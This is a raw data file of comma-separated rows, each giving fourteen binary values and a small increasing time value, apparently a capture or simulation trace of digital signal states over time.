1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146652e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146680e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4271028e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.4271240e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.4271244e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271260e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,2.4271292e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271316e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4271636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271664e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4271688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4271740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4271788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4271836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4271860e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,2.4271868e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,1,2.4271916e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4271924e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4271940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4271948e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4271964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4271988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272112e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272260e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4272268e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4272316e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4272340e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4272344e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272348e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272388e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4272392e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4272436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4272464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272468e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272512e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4272964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4272988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273060e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273068e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4273116e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273140e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4273144e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273148e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273312e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273588e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273592e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4273636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273668e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273812e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273820e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4273864e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273888e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4273892e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4273896e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4273912e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273940e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4273964e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4273988e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274012e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274036e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274060e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274088e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274112e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274140e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274188e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274212e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274268e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274488e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274492e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274512e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274540e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4274564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4274588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274596e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4274964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4274988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275060e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4275068e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4275116e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4275140e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4275144e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275148e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4275368e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4275412e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4275436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275444e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4275644e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4275688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4275712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275720e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4275964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4275988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276012e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.4276016e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276020e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4276064e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276088e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4276092e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276096e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276112e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276244e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4276288e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276312e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276320e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276460e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276512e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276516e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4276564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276596e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276644e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4276688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276720e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276812e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276820e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4276836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4276860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276868e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276916e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4276964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4276988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277112e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277312e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4277316e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4277364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4277388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277396e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4277444e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4277488e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4277512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277520e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277712e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4277716e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4277764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4277788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277796e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4277964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4277988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278112e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278312e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278508e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278536e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278560e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278584e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4278612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4278636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4278640e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,2.4402996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,2.4403188e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,2.4403220e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,2.4403244e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,2.4403552e-02 1,0,0,1,0,1,0,0,0,0,0,0,1,1,2.4403584e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4403588e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4403636e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4403660e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4403708e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4403736e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.4403788e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4403812e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4403828e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4403860e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4403884e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4403892e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4403908e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4403936e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4403940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4403960e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4403988e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4404012e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404036e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404084e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404108e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404160e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404188e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404236e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404260e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404312e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404336e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404340e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4404360e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404388e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404392e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404408e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404436e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4404460e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404484e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404532e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404556e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404608e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404636e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404684e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404708e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404756e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404784e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404788e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4404808e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404832e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404840e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404860e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404884e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404888e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4404908e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4404932e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4404940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4404984e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405008e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405060e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405084e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405132e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405156e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405208e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4405236e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4405260e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4405284e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405292e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405308e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405332e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405356e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405380e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405408e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405436e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405460e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405484e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405508e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405536e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405560e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405588e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405612e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405636e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405660e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405684e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405736e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405760e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4405764e-02 